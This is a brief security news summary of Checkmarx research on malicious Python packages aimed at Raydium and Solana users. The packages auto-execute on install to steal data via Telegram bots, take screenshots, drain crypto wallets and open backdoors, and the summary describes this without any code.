Upon installation, this code would execute automatically, compromising victim's systems, exfiltrating data, and draining crypto wallets, Checkmarx researchers reported.
The rogue Python packages aimed at Raydium and Solana users, concealing advanced malware to steal various sensitive data and grant remote access to threat actors.
Malicious packages disguised their behavior by listing legitimate dependencies, highlighting the need for enhanced security measures in software development.
The malware exfiltrated data to Telegram bots, captured system screenshots, searched for sensitive files, and established backdoor access for long-term compromise.
Collection
[
|
...
]